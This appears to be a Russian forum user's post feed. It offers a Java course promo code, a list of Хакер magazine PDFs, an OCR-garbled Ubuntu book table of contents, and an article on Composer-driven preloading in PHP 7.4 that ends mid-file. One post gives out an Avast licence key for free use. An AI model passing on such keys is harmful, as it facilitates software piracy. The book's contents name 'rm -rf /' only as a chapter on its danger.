admin

Администрация
  • Публикаций

    33
  • Зарегистрирован

  • Победитель дней

    1

Весь контент admin

  1. Бесплатно (вместо 19799р) получаем обучающий курс Java Programming: Complete Beginner to Advanced 1. Переходим на тык и в поле "Введите купон" вводим промокод 95DF94FC6BD6361D0117 2. Регистрируемся и скачиваем курс
  2. admin

    ХАКЕР

    Хакер №2 (239) (февраль) 2019 .pdf Хакер №3 (240) (март) 2019 .pdf Хакер_2019_04.pdf Хакер 2019 05.pdf Хакер №6 (243) (июнь) 2019 .pdf Хакер_2019_07.pdf Хакер_№9_(246)_(сентябрь)_2019.pdf
  3. Ubuntu_Linux_s_nulya_2018_Volokh.pdf Оглавление Предисловие ................................................................................................................... 11 Для кого эта книга .. " .. ".""."""""""."".""""""" .. ".""""".""".".""".""".".".".".""""".".""".12 Как устроена книга .. """."""."""""" ... """.""".".""."."."." .. "".""."""."."".""" .. "" .. """."."."12 Как читать эту книгу."""" .. "." .. ".""" .. ".""".""." .. """"." .. " .. ".".".""."."."" .. " .. "."."""""""". 13 От автора """""."" ... """""."""." .. """""."""."." .. """."""."""."."""."."" .. "" ... """"." .. "."."."13 Благодарности ............................................................................................ " ........... " ..... " .......... " .. 14 Введение .......................................................................................................................... 15 История появления ОС Linux """.". ". "" ""." ." "" "" .".". ""."" "."." ." ." ". ""." ."."". "".""""" ""16 GNU и Linux. ". " .. ". """"." "" ""." "" " ... " "" ." .. " ""." " ... " ." " .. """ .. "."." .. " ." ." ." ""."""" "" ."." ." 17 Появление различных дистрибутивов"." .. "."".""".""""."".""."".".""."".""""""" .. "." ""."".18 Дистрибутивы Linux ........................................................................................................... " ......... 19 Red Hat Enterprise Linux ... " "" "" ." "" ". "" ." .. " "" """ " ... " ""." "" ."." ." " .. " ""."." ." ." """ .. ".20 Fedora Linux ............................................................................................................................ 20 Deblan ...................................................................... " ............................................... " ............. 20 UЬuntu ............... " ...................................................................................................... " ............ 20 Linux Mint "". "" "" """ .. ". ""." "" "" ". "" " ... "." .. " ." "" ." "" ." .". " .. " ". " ... " ."." "" ." ."""" """ .. 21 Slackware ........................................................................................................ " .......... " .. " ....... 21 Логотип Linux ............................................................................ " ........................ " ..... " .... " ........ ".21 Область применения Linux ............................................................................................ " ....... " .... 22 Идеология свободного ПО ...................................................................................................... " .... 23 Безопасен ли открытый исходный код?" .. """."""."""."." .. "."""" .. """."."" .. "."""."."""." .".24 Критика и очевидные достоинства ОС Linux"".""."" .. """"."""""."."."""" .. """""".".".""".25 ЧАСТЬ 1. ЗНАКОМЬТЕСЬ: UBUNTU ............................................................ : ......... 27 Глава 1. Подготовка к установке ОС Ubuntu Linux ............................................... 29 ОС UЬuntu Linux .............................................................................................................. " ............ 29 Версии дистрибутивов ОС Ubuntu .. " ... " "" ". "" ." "" " ... " " .. ""."". ". "" ."". """ """. ""."."."""" "29 Версии LTS и нe-LTS ."""" .. """".""" ... "." .. " .. "." .. "" .. " .. """"".".""".".""".".".".""."".".".".30 Варианты установки ОС Ubuntu Linux """ " .. ". " .. ". "" ""." "."" "" ". ""."""" ""."."." ""."."."." .30 Порядок установки операционных систем ""." .. ".""""".""".".""""."."".".".".""""."".".".".31 Как получить дистрибутив ОС UЬuntu? .""."""""""""".""""""."".""""" ... "."""."."."."""""31 Запись образа диска с ОС Ubuntu ................................................................................................. 33 4 Оглавление Создание загрузочного флеш-накопителя ................................................................................... 34 Файловые системы ОС UЬuntu Linux ........................................................................................... 36 Файловые системы ext2, ext3 и ext4 ..................................................................................... 36 Файловая система Btrfs ......................................................................................................... 37 Файловая система XFS .......................................................................................................... 37 Файловые системы ReiserFS и Reiser4 ................................................................................. 37 Файловая система JFS ........................................................................................................... 38 Выводы ........................................................................................................................................... 38 Глава 2. Теоретический минимум о файловой системе в ОС Ubuntu Linux"".39 Разделы жесткого диска ............................................................................................................... .39 Первичные, расширенные и логические разделы .............................................................. .40 Точки монтирования ..................................................................................................................... 40 Точки монтирования в ОС Ubuntu ...................................................................................... .41 Очередность создания разделов .................................................................................................. .42 Объем раздела /swap ..................................................................................................................... .43 Объем корневого раздела .............................................................................................................. 43 Объем раздела /home .................................................................................................................... .43 Подготовительные действия перед установкой ......................................................................... .44 Выводы ........................................................................................................................................... 44 Глава 3. Создание разделов для установки ОС Ubuntu Linux """""""""""""".45 Выбор типа носителя для загрузки операционной системы в меню BIOS .............................. .45 Особенности установки на платах с UEFI .................................................................................. .46 Варианты запуска и установки ОС UЬuntu ................................................................................. .46 Запуск ОС Ubuntu с загрузочного флеш-накопителя ......................................................... .47 Запуск ОС Ubuntu с DVD-привода ...................................................................................... .48 Для чего нужен Livе-режим? ............................................................................................... .49 Запуск программы GParted .................................................................................................. .49 Возможности программы GParted ................................................................................................ 50 Разметка жесткого диска в программе GParted .......................................................................... 51 Выводы ........................................................................................................................................... 57 Глава 4. Установка ОС Ubuntu Linux """"""""""""""""""""""""""""""""""". 58 Запуск операционной системы в Livе-режиме ............................................................................ 58 Установка операционной системы из Livе-режима .................................................................... 59 Выводы ........................................................................................................................................... 66 Глава 5. Первый запуск и первоначальная настройка ОС Ubuntu""""""""""67 Запуск ОС Ubuntu .......................................................................................................................... 67 Настройка подключения к Интернету в Ubuntu .......................................................................... 70 Подключение к сети по Wi-Fi ............................................................................................... 70 Настройка подключений в NetworkМanager ........................................................................ 71 Если не определилась сетевая карта .................................................................................... 72 Создание подключения Ethemet ........................................................................................... 73 Подключение через DSL ....................................................................................................... 74 Особый случай подключения через DSL ............................................................................. 76 Подключение с помощью USВ-модема ............................................................................... 82 Возможные проблемы с созданием подключений .............................................................. 85 Вьiводы ........................................................................................................................................... 87 Оглавление 5 Глава 6. У станов ка обновлений и локализация операционной системы""""" 88 Установка обновлений ............................................................................... : .................................. 88 У станов ка пакетов локализации ................................................................................................... 91 Выводы ........................................................................................................................................... 93 Глава 7. Обзор интерфейса ОС Ubuntu"""""""""""""""""""""""""""""""""".94 Графическая среда рабочего стола ............................................................................................... 94 Рабочий стол в Unity ...................................................................................................................... 94 Панель меню .......................................................................................................................... 95 Панель запуска ....................................................................................................................... 97 Рабочее место ......................................................................................................................... 98 Главное меню ............................................................................................................................... 100 Меню HUD ................................................................................................................................... 101 Выводы ......................................................................................................................................... 102 Глава 8. Настройка операционной системы и решение проблем"""""""""""103 Параметры системы ..................................................................................................................... 103 Настройка раскладки клавиатуры .............................................................................................. 104 Смена системного времени ......................................................................................................... 105 Настройка спящего режима ........................................................................................................ 107 Пустой рабочий стол ................................................................................................................... 108 Изменение порядка загрузки операционной системы .............................................................. 109 Выводы ......................................................................................................................................... 111 ЧАСТЬ 11. UBUNTU ДЛЯ ПОЛЬЗОВАТЕЛЯ""""""""""""""""""""""""""""113 Глава 9. Структура файловой системы """""""""""""""""""""""""""""""""115 Файловый менеджер Nautilus ..................................................................................................... 115 Имена устройств .......................................................................................................................... 117 Структура файловой системы ..................................................................................................... 119 Общее описание структуры каталогов ............................................................................... 120 Корневая файловая система ................................................................................................ 123 Домашний каталог пользователя ........................................................................................ 123 Каталог /Ьin/ ......................................................................................................................... 124 Каталог /Ьооt/ ....................................................................................................................... 124 Каталог /cdrorn/ .................................................................................................................... 124 Каталог /dev/ ......................................................................................................................... 124 Каталог /etc/ ........................................................................................................................ "125 Каталог /home/ ...................................................................................................................... 125 Каталоги /liЫ и /Jib64/ .......................................................................................................... 126 Каталог /lost+found/ ................................................................................. " .......................... 126 Каталог /media/ ..................................................................................................................... 126 Каталог /mnt/ ........................................................................................................................ 127 Каталог /opt/ ......................................................................................................................... 127 Каталог /proc/ ....................................................................................................................... 127 Каталог /root/ ........................................................................................................................ 127 Каталог /run/ ......................................................................................................................... 128 Каталог /sЬin/ ........................................................................................................................ 128 Каталог /snap/ ....................................................................................................................... 128 б Оглавление Каталог /srv/ .......................................................................................................................... 128 Каталог /sys/ ......................................................................................................................... 128 Каталог /tinp/ ........................................................................................................................ 129 Каталог /usr/ .......................................................................................................................... 129 Каталог /var/ ......................................................................................................................... 129 Выводы ......................................................................................................................................... 129 Глава 10. Типы файлов в ОС Ubuntu ...................................................................... 130 О файлах и каталогах .................................................................................................................. 130 Содержимое и расширение файлов ............................................................................................ 131 Текстовые файлы ......................................................................................................................... 132 Исполняемые файлы .................................................................................................................... 134 Прочие файлы .............................................................................................................................. 135 Изменение ассоциации файлов ................................................................................................... 135 Выводы ......................................................................................................................................... 137 Глава 11. Администратор и суперпользователь root ........................................... 138 Привилегированный пользователь root ..................................................................................... 138 Обычная учетная запись и запись администратора .................................................................. 139 Привилегии администратора ...................................................................................................... 141 Административные задачи в текстовом режиме ....................................................................... 143 Выводы ......................................................................................................................................... 143 Глава 12. Знакомство с Консолью и Терминалом ................................................ 144 Что такое Терминал и Консоль .................................................................................................. 144 Запуск Консоли ............................................................................................................................ 145 Запуск Терминала ........................................................................................................................ 146 Синтаксис команд в Терминале .................................................................................................. 148 Команда echo ................................................................................................................................ 148 Просмотр версии ядра ................................................................................................................. 149 Установка текушего каталога ..................................................................................................... 149 Просмотр текушего каталога ...................................................................................................... 150 Просмотр содержимого каталога ............................................................................................... 151 Просмотр справки no командам ................................................................................................. 152 Подсказки Терминала .................................................................................................................. 154 История введенных ранее команд .............................................................................................. 154 Очистка окна Терминала ............................................................................................................. 155 Остановка выполнения командъ1 ................................................................................................ 155 Выход из Терминала .................................................................................................................... 156 Выводы ......................................................................................................................................... 156 Глава 13. Полезные команды Терминала .............................................................. 157 О пользе работы в Терминале .................................................................................................... 157 Команда whoami, или "Кто я?" ................................................................................................... 157 Команда who ................................................................................................................................. 158 Создание файлов .......................................................................................................................... 159 Создание каталогов ..................................................................................................................... 162 Удаление каталогов ..................................................................................................................... 163 Удаление каталогов и файлов ..................................................................................................... 164 Опасность выполнения команды rm -rf / ........................................................................... 165 Оглавление 7 Копирование файлов и каталогов.""".""." .......................................................................... " .... 166 Перемещение файлов и каталогов .... " .. " ........................ ".".".""."."."""."""."." .. "." .. "."" .. ".171 Вывод содержимого файла" .. " .. " .. ".""""" .. " ....................... "."." .. " .... " ..... "."." .. ". " ........... " .. 173 Вывод содержимого файла в обратной последовательности ....................... " ......................... 175 Команды more и /ess для просмотра содержимого файлов."."." .......... " ....... "." .. " .. "."" ..... ".177 Команда поиска файлов ...... """" " .. " .. " "". ". " .. " .. ". " .. " .. ". ". "" ". ". " .. ". ". " .. ". ". ". " .. ". ". " .. ". ".181 Отображение каталога программы ". "" ". "".". ". "" " ............ " ......... ". ". ". " .. ". ". ". "" ". ". " .. ". ".183 Поиск текстового шаблона в файлах " .. " .. ". "" """. " .. """" .. "" ". "."" """.".". """"" """."."""183 Управление остановкой системы ... "." ...... " .. "." .. " .. "" .. " .. " .. "." .... " ............ "." ..... " .... "."." .. ".191 Выводы .. "." ..... "." .. " .. "." .. " .. "." ... " .. "" .. " .. "." .. " .. "." .. "." .. " .. "."."." .. "." ..... "."." .... " ...... " ....... 193 Глава 14. Работа с привилегиями root .................................................................... 194 О привилегиях root " ...... " ..... " .. " .. ". " .. ". "". ". " .. ". " ..... " .. ". " .. ". " .. ". " ..... "" .. ". ". "."." .. "." .. "" .. 194 Команда sudo вместо прав root. " ..... " ................ " ............ " ........ " ............ " ....................... " ..... ". 195 Что использовать: sudo или su? " .. " .. "." .. " .. ". "." ... "" .. " .. ". " .. "."." .. ".". " .. "" .. "."."." .. ". "." .. "195 Команда sudo ............................................................................................................................. ".196 Запуск графических программ от имени администратора"."." .. "."."." .. "."."." .. " .... "." ........ 200 Настройка sudo и прав доступа на выполнение команд" .. "." .. "."." .. "." .... "."." .. "."." ..... ".".202 Время действия введенного пароля ........................................................................................... 205 Выводы ....................................................................................................................... " ................ 206 Глава 15. Установка драйверов в ОС Ubuntu ....................................................... 207 Драйверы в ОС UЬuntu ................................................................................................................ 207 Установка сетевой карты Realtek." .. ". " .. ". "." .. " .. ". " .. ". "."." ... ". ". ". " .. ". ".". "."." .. ". ". ". "" ".208 Установка драйвера беспроводной сети Broadcom " .. " ... " .... " .... " .. "" .............. " ........... " .. "" .. 212 Установка драйвера видео карты из репозитория " .. "."." .. "." .. " ..... " .... "."."." ..... " .. " .... ".".".216 Общий метод установки видео драйвера AMD/ А Т1 Radeon""" .. "."." ........ "."." .. "." .... " .. ".".217 Установка аудиодрайвера .. " .. " .. "." .. ".""" .. " .. "."."." .. "."""."""."." .. "."."."." .. "."."." ..... " .... 219 Установка ALSA из исходных текстов " ..... "." .. " .. "." ..... " ..... "." .. "."."." ..... "."." .... " ..... ".".".221 Выводы ....................................................................................................................... " ................ 225 Глава 16. Установка принтера в ОС Ubuntu ......................................................... 226 Об установке принтеров, сканеров и МФУ "."."""."." .. " .. "." .. "." .. "."."."""."." ....... " ........... 226 Где взять необходимые драйверы? ............................................................................................ 226 Устройства Brother ." .. " .. "." .. " ..... " .. " .. "." .. "." .. "." .. " .. "."."." .. "."." .. "."." .. "."."."." .. " ... 227 Устройства Canon ................................................................................................................ 227 Устройства Epson .... " .. "." .. " .. "." .. " .. "." ... "."." .. "." ..... " .. "." .. "." .. "" .. " .... " ........ " ..... "." ... 227 Устройства НР " ...... " .. "." .. " .. "." .. " .. " .. "." .. "."."" ... " .. " .. "." .. "." .. "."."." .. ".:""."." .. " ...... 227 Устройства Samsung ............................................................................................................ 227 Устройства Xerox ................................................................................................................. 228 Установка службы CUPS ...... " .. " .. "." ...... " ..... "." .. " .. "." .. "." .. "." ..... "." .. "."." .. "."." .... " .. "."."228 Установка принтера Epson L800 средствами ОС."." ... " .... " .. "." ........ " .. "."" ........ " ..... " ........ "229 Настройка общего доступа ......................................................................................................... 233 Установка МФУ Epson Stylus СХ5900 с помощью драйверов "." ........ " ................................. 235 Выводы ....................................................................................................................... " ................ 240 Глава 17. Установка и удаление программ в ОС Ubuntu ................................... 241 Особенности установки и удаления программ .......................................................................... 241 Зависимости пакетов в ОС UЬuntu Linux." .. " .. "." .. " .. "." .. "." .. " ..... "."." .. "" .. " .. "" .. "."."242 Установка приложений с помощью Менеджера приложений UЬuntu ".".".""" .... " .. "."243 в Оглавление Установка приложений из dеЬ-пакетов .............................................................................. 246 Установка dеЬ-пакетов с помощью Терминала ................................................................. 248 Установка приложений из Терминала ............................................................................... 251 Установка приложений из исходных текстов .................................................................... 254 РепозИтории в ОС UЬuntu ........................................................................................................... 258 Удаление программ ..................................................................................................................... 262 Выводы ......................................................................................................................................... 264 Глава 18. Установка дополнительного программного обеспечения ................ 265 Дополнительное ПО в Ubuntu .................................................................................................... 265 Дополнительные медиамодули ................................................................................................... 265 Мультимедийные проигрыватели .............................................................................................. 267 WеЬ-браузеры .............................................................................................................................. 269 ВitТоттеnt-клиент ......................................................................................................................... 269 Файловый менеджер .................................................................................................................... 270 Редактирование изображений ..................................................................................................... 270 Запись СD/DVD-дисков .............................................................................................................. 271 Выводы ......................................................................................................................................... 271 Глава 19. Запуск Windоws-приложений в ОС Linux ............................................ 272 Wiпe для запуска приложений ОС Windows ............................................................................. 272 Установка Wiпe ............................................................................................................................ 272 Установка и запуск Windоws-приложений ................................................................................ 275 Выводы ......................................................................................................................................... 278 Глава 20. Работа с архивами в ОС Ubuntu ............................................................. 279 Об архивах в ОС Ubuntu .............................................................................................................. 279 Менеджер архивов ....................................................................................................................... 279 Несжатые и сжатые архивы ........................................................................................................ 281 Архиватор tar ................................................................................................................................ 282 Архиватор gzip ............................................................................................................................. 286 Архиватор bzip2 ........................................................................................................................... 288 Прочие архиваторы ..................................................................................................................... 288 Неизвестный тип файла ............................................................................................................... 290 Выводы ......................................................................................................................................... 290 ЧАСТЬ 111. UBUNTU ДЛЯ ОПЫТНОГО ПОЛЬЗОВАТЕЛЯ ............................ 291 Глава 21. Группы пользователей и права доступа ............................................... 293 Пользовательские группы ........................................................................................................... 293 Права доступа в Linux ................................................................................................................. 293 Буквенное представление прав доступа к файлу ...................................................................... 295 Буквенное представление прав доступа к каталогам ................................................................ 297 Цифровое представление прав доступа ..................................................................................... 300 Символьные биты SUID, SGID и sticky ..................................................................................... 301 Права доступа по умолчанию ..................................................................................................... 304 Смена прав ................................................................................................................................... 305 Смена владельца файла ............................................................................................................... 308 Смена атрибутов файла .............................................................................................................. .308 Оглавление Просмотр атрибутов .................................................................................................................... 31 О Выводы ......................................................................................................................................... 311 Глава 22. Жесткие и символические ссылки """"""""""""""""""""""""""""312 Ссылки в ОС Linux ...................................................................................................................... 312 Типы ссылок ................................................................................................................................. 313 Создание ссьшок .......................................................................................................................... 314 Работа с символическими ссылками .......................................................................................... 316 Работа с жесткими ссылками ...................................................................................................... 318 Выводы ......................................................................................................................................... 319 Глава 23. Монтирование файловых систем""""""""""""""""""""""""""""".320 Точка монтирования .................................................................................................................... 320 Монтирование устройств в ОС Ubuntu ...................................................................................... 320 Способы постоянных именований ............................................................................................. 321 Именование посредством UUID ........................................................................................ .323 Именование посредством имен устройств ........................................................................ 324 Именование посредством меток устройств ...................................................................... .324 Именование посредством Hardware ID .............................................................................. 326 Универсальный метод получения информации о блочных устройствах ................................ 327 Автоматическое монтирование .................................................................................................. 327 Ручное монтирование и размонтирование устройства ............................................................. 331 Выводы ......................................................................................................................................... 332 Глава 24. Уровни выполнения и цели в ОС Ubuntu""""""""""""""""""""""333 Инициализация системы ............................................................................................................. 333 Уровни выполнения ..................................................................................................................... 333 Современная система уровня запуска ........................................................................................ 335 Выводы ......................................................................................................................................... 338 Глава 25. Службы в ОС Ubuntu""""""""""""""""""""""""""""""""""""""""339 Службы, сервисы и демоны ........................................................................................................ 339 Службы в ОС Ubuntu .................................................................................................................. .339 Управление службами в ОС Ubuntu ........................................................................................... 340 Автозагрузка служб и отключение служб ................................................................................. 345 Управление питанием .................................................................................................................. 346 Управление питанием ACPI ........................................................................................................ 347 Ведение логов в systemd .............................................................................................................. 348 Выводы ......................................................................................................................................... 349 Глава 26. Управление процессами в ОС Ubuntu """""""""""""""""""""""" .. 350 Процессы в ОС UЬuntu ................................................................................................................ 350 Системный монитор процессов top ............................................................................................ 350 Получение списка процессов ...................................................................................................... 354 Завершение процесса командой kill ........................................................................................... 3 56 Завершение процесса командой kil/all ....................................................................................... 358 Управление процессами в Консоли ........................................................................................... 360 Прочие инструменты по управлению процессами ................................................................... 361 Выводы ......................................................................................................................................... 362 10 Оглавление Глава 27. Проверка работоспособности сети в ОС Ubuntu ................................. 363 Сеть в ОС UЬuntu ......................................................................................................................... 363 Определение сетевого оборудования ......................................................................................... 363 Проверка соединения с Интернетом .......................................................................................... 365 Трассировка маршрута ................................................................................................................ 367 Выводы ......................................................................................................................................... 369 Глава 28. Подключение к удаленному рабочему столу ....................................... 370 Удаленный рабочий стол ............................................................................................................ 370 Подключение к рабочему столу Windows ................................................................................. 370 Подключение с помощью TeamViewer ...................................................................................... 374 Выводы ......................................................................................................................................... 376 Глава 29. Восстановление загрузчика GRUB ........................................................ 377 Сбой в работе загрузчика ............................................................................................................ 377 Восстановление загрузчика GRUВ ............................................................................................ 377 Простой способ восстановления загрузчика GRUB ................................................................ .380 Восстановление GRUB в консоли загрузчика ........................................................................... 382 Выводы ......................................................................................................................................... 384 Глава 30. Увеличение разрешения ОС Ubuntu в VirtualBox .............................. 385 ОС UЬuntu в виртуальной машине ............................................................................................. 385 Виртуальная машина Orac\e УМ Virtua\Box ............................................................................. 385 Низкое разрешение экрана в виртуальной машине .................................................................. 386 Установка дополнений ................................................................................................................ 3 86 Выводы ......................................................................................................................................... 390 Заключение ............................................................•...................................................... 391 Приложение. Описание электронного архива ....................................................... 393 Предметный указатель .............................................................................................. 395
  4. admin

    avast

    Бесплатно получаем лицензию на антивирус Avast Premier на 9 лет 1.Переходим на сайт Avast и жмём на кнопку Бесплатная загрузка для ПК 2.В настройках вводим ключ лицензии 3DWS9E-CW75YJ-4Q48YA
  5. Как Composer должен выполнять предзагрузку в PHP 7.4 Предзагрузка (preload) — одна из важных возможностей, которую PHP 7.4 предлагает разработчикам, нуждающимся в более высокой производительности. Эту функцию можно назвать «прогревом» перед внедрением JIT-движка, который появится (или должен появиться) в PHP 8. До этого будет достаточно предзагрузки, и кто знает, возможно, они смогут работать в тандеме. Что собой представляет функция предзагрузки, объяснено в этой статье. Суть очень проста: в php.ini указывается PHP-скрипт, для которого при запуске процесса в память загружаются файлы (предзагрузка). В сочетании с OPCache и функцией autoloader Composer-файлы также могут быть однократно скомпилированы и залинкованы, после чего они будут доступны для всех последующих запросов. Благодаря этому PHP не нужно загружать и компилировать файлы при каждом запросе. Однако разработчики Composer не пришли к согласию, как он должен помогать предзагрузке, помимо предоставления функции автозагрузки. Факты таковы: предзагрузка впервые анонсирована в PHP 7.4; не существует директивы Composer, помогающей выполнять предзагрузку файлов; для предзагрузки нужен доступ к php.ini, то есть к самому процессу; предзагрузка всех файлов не обязательно повысит производительность по сравнению с предзагрузкой только самых востребованных файлов. Иными словами, предзагрузкой смогут пользоваться только те, у кого есть полный доступ к серверам. Это исключает серверы общего использования и некоторые PaaS-решения, которые не предполагают работу с php.ini. Итак, как же Composer может помочь предзагрузке, учитывая, что это нововведение? Вот моё мнение. Как должна работать предзагрузка Механизм работы предзагрузки должен опираться на список файлов, которые будут загружены и сохранены в памяти при запуске. А поскольку это список, нам нужно работать с массивом файлов и позволить Composer выполнять всю работу, а не загружать каждый файл вручную. Composer должен брать список файлов, заданный приложением (корневым проектом), и компилировать всё в файлы, которые PHP сможет использовать безо всяких затруднений. В то же время нам нужна возможность добавлять и удалять пакеты из механизма предзагрузки. Предзагрузка никогда не должна работать на уровне пакетов, поскольку это ответственность разработчика — разрешать или запрещать предзагрузку каждого пакета. Предзагрузка в Composer должна быть опциональной. Разработчик должен иметь возможность её отключать, чтобы PHP использовал собственный предзагрузчик, который может работать на основе анализа OPCache, — это зависит от загрузки приложения и работает гораздо эффективнее простой предзагрузки всех файлов. Всё начинается в preload.json Чтобы не усложнять систему, поместим в корень проекта файл preload.json. В нём будут перечислены файлы для предзагрузки, которые сможет выбирать Composer. Поскольку это JSON-файл, разработчик может по своему усмотрению даже генерировать его с помощью специальной команды. Я считаю, что было бы отлично, если бы Composer имел утилиту для создания такого JSON-файла на основе скрипта. { "pre-compile": [ "my-script.php", "my-other-script.php" ], "extensions": [ "php" ], "files": [ "app/*", "config/", "helpers.php", "app/Models/*", "app/Controllers/*/Http/*", "app/Views/Compiled*.php" ], "namespace": [ "App\\Models", "App\\Controllers\\", "App\\Views\\MainView", "Vendor\\Package\\*", ], "packages": { "symfony/http-client": true, "robert/*-client": true, "vendor/package": { "files": true, "namespace": true }, "foo/bar": { "files": [ "helpers.php", "loaders/*" ], "namespace": [ "Foo\\Bar\\DynamicLoaders\\*", "Foo\\Bar\\Clients" ] } }, "output": "preload-compiled.php" } Использование preload.json позволяет быстро проверять, включена ли в проекте предзагрузка: если файл отсутствует, то предзагрузка не поддерживается или нежелательна. Давайте разберёмся, что делают ключи. pre-compile Эти файлы будут исполняться Composer. Каждый скрипт должен вернуть массив абсолютных путей к файлам, чтобы добавить их в список предзагрузки, который будет играть роль основного списка. "pre-compile": [ "my-script.php", "my-other-script.php" ] Эти файлы будут исполнены в указанном порядке. Цель в том, чтобы разработчик мог создавать список файлов по своему усмотрению, а не полагаться на один лишь JSON-файл. Эти файлы будут исполнены прежде всего. И да, вы сможете реализовать preload.json только с этим ключом. Поскольку мы говорим о PHP-файлах, при компилировании массива вы даже можете добавлять другие файлы extensions Это список расширений файлов, которые нужно предварительно загрузить. По умолчанию берутся файлы только с расширением php. "extensions": ["php", "php5", "php7"] Например, вы можете добавить директорию, наполненную файлами *.phtml, среди которых несколько полезных PHP-файлов, и Composer выберет только их, а не всё содержимое директории. Как вы понимаете, этот процесс можно заменить добавлением файлов вручную. files Этот ключ говорит Composer, чтобы он загрузил все файлы из списка, пути к которым указаны относительно местонахождения composer.json. "files": [ "helpers.php", "app/Models/*", "app/Controllers/*/Http/*", "app/Views/Compiled*.php", ] Разобраться в списке очень просто: -для добавления файлов и директорий используйте относительные пути; -из директорий будут добавляться только хранящиеся в них дочерние файлы (не рекурсивно); -рекурсивные пути обозначаются окончанием в виде звёздочки (*); -с помощью этого символа вы также можете, к примеру, добавлять определённые файлы и директории: src/Clients/*/Stores или src/Model*.php. Добавление файлов по маске без ручного выбора или создания привязанных к приложению скриптов особенно полезно при разработке больших приложений. Если вам нужно просто предварительно загрузить все файлы с помощью ключа autoload в JSON-файле Composer, то присвойте ему значение true. namespace Этот ключ говорит Composer, чтобы тот загрузил файлы с заданным пространством имён или названием класса вроде file или directory. Этот же механизм позволяет динамически вызывать имена пространств из других установленных пакетов. "namespaces": [ "App\\Models", "App\\Controllers\\", "App\\Views\\MainView", "Vendor\\Package\\*", ] Это тоже удобно при работе над большими приложениями, больше зависящими от пространств имён, а не от файлов, которые могут в любой момент измениться. Composer будет автоматически извлекать файлы в соответствии с пространством имён и помещать их в список. packages Этот ключ позволяет загружать другие файлы, зарегистрированные из внешних пакетов, например вспомогательные файлы или классы, привязанные к пространству имён. "packages": { "symfony/http-client": true, "robert/*-client": true, "vendor/package": { "files": true, "namespace": true }, "foo/bar": { "files": { "helpers.php", "loaders/*" }, "namespace": [ "Foo\\Bar\\DynamicLoaders\\*", "Foo\\Bar\\Clients" ] } } Тут всё очень просто: если значение равно true, то будет загружено всё содержимое ключа autoload в файле composer.json этого пакета. В противном случае можно более тонко управлять добавлением в предзагрузку. Если значение ключа равно true, то он загрузит все файлы, зарегистрированные в autoload. По умолчанию значение равно false. Это верно и для ключа namespace. Также с помощью этого правила можно выбирать отдельные файлы или пространства имён. Но в таком случае ключ autoload использоваться не будет. output Это просто имя файла скомпилированного списка предзагрузки. "output": "preload-compiled.php" Простота сборки Наш список предзагрузки готов, и мы можем вызвать Composer, чтобы он собрал основной скрипт предзагрузки. composer preload В результате будет создан preload-compiled.php со всеми файлами, которые должен предварительно загрузить PHP. Конечно, вы можете изменить название файла по своему усмотрению. Также нужно переопределить ключи preload параметрами. composer preload \ --input=my-custom-preload-list.json \ --output=my-preload.php Отключено по умолчанию Проекты без preload.json будут возвращать ошибку, если вы попытаетесь собрать файл для предзагрузки. Причина в том, что Composer не будет (да и не должен) гадать, что ему предварительно загружать. Напомню, что preload не вмешивается в нормальную функциональность Composer. Поскольку это консольная команда, то при локальной разработке вы можете полностью отказаться от предварительной загрузки. Единственное, что нужно механизму предзагрузки от Composer, это файл Autoload, который должен быть сгенерирован в случае отсутствия. Ну ведь почти 2020-й год на дворе, везде используется PSR-4, верно? Результат У вас должен получиться php-файл с примерно таких содержимым: <?php /** * Preloading @generated by Composer */ // Autoload the classes so those can be preloaded using `require_once`. require_once __DIR__.'/../autoload.php'; // File list $files = [ '/var/www/app/Foo.php', '/var/www/app/Bar.php', '/var/www/helpers/basic.php', '/var/www/helpers/advanced.php', '/var/www/vendor/Foo/Bar/src/Class.php', '/var/www/vendor/Foo/Bar/helpers/helpers.php', '/var/www/vendor/Foo/Bar/config.php', // ... ]; // Preload all root project files foreach ($files as $file) { require_once $file; } По сути, это лишь список файлов, которые будут предварительно загружаться с помощью функции autoloader в Composer. PHP исполнит этот файл однократно, и он станет историей. Я искренне надеюсь, что в Composer появится какой-то способ предварительно загружать файлы без необходимости писать хак. Поскольку описанный выше способ не является частью ядра Composer, вы всё ещё можете на основе анализа OPCache выбирать для предзагрузки самые важные файлы, не трогая менее востребованные. Представьте, что вместо предзагрузки 1500 файлов объёмом 100 Мб вы можете загрузить всего 150 файлов объёмом 10 Мб, сохранив 99% изначальной производительности. Предзагружаем одной строкой проект на PHP 7.4 Вскоре после того как я написал статью о том, как Composer может помочь вам в предзагрузке проекта, Seldaek (участник команды разработки Composer) убил всякую надежду на появление в Composer опции лёгкой предзагрузки проекта в PHP-процесс из менеджера пакетов. Почему? Предзагрузка в PHP является проблемой скорее разработки (а не зависимостей), она решается с помощью ручного редактирования php.ini — это могут делать только разработчики, если они сами управляют PHP. Но это не помешает мне создать свой пакет для предзагрузки проекта. И вам тоже. Предзагрузка и метрики Предзагрузка может стать хорошим инструментом для простого и дешёвого повышения производительности без серьёзной переработки. Но проблема не в том, как предзагружать, а что. Предзагрузка целых фреймворков и тысяч файлов быстро истощит память, так что делать это вслепую — не вариант, по крайней мере в больших проектах. Целесообразно загружать только самые востребованные файлы. Но как их определить? К счастью, OPCache позволяет с помощью opcache_get_status() собирать данные о том, к каким файлам происходит больше всего обращений. Можно не только узнать, какие файлы самые востребованные, но даже сколько памяти они потребляют спустя какое-то время после запуска приложения. Рекомендуют подождать либо неделю, либо до того момента, когда OPCache зарегистрирует определённое количество обращений. Всё зависит от приложения, но суть вы поняли. Так давайте создадим список предзагрузки на основе статистики наиболее популярных файлов. Я сделал для этого пакет. Я долго ломал голову в поисках наилучшей стратегии создания списка. И пришёл к выводу, что лучше всего добавлять в него все файлы, пока не упрёшься в предел памяти, который для пакетов по умолчанию равен 32 Мб. Файлы будут отсортированы по количеству обращений, а сам пакет автоматически будет исключен. Иными словами, PHP повысит производительность приложения при обработке большинства запросов к нему. И как это использовать? Укажите Composer Autoloader, куда записывать скрипт Preloader, и готово. use DarkGhostHunter\Preloader\Preloader; Preloader::make() ->autoload('vendor/autoload.php') ->output('preload.php') ->generate(); Конечно, вам выбирать, когда генерировать, но в этом вся соль. Вы даже можете делать это рандомно и перезаписывать список, например, на каждый 100-й запрос. use DarkGhostHunter\Preloader\Preloader; Preloader::make() ->whenOneIn(100) ->autoload('vendor/autoload.php') ->output('preload.php') ->overwrite() ->generate(); Вы получите готовый скрипт предзагрузки, которой можно класть в php.ini. <?php /** * This file is generated automatically by Preloader. * * This script uses Composer Autoload file and `require_once` to preload the files in this * list. Add this file to your `php.ini` in `opcache.preload` to preload this list into * PHP at startup. Additionally, this file also includes information about Opcache. * * * Add (or update) this line in `php.ini`: * * 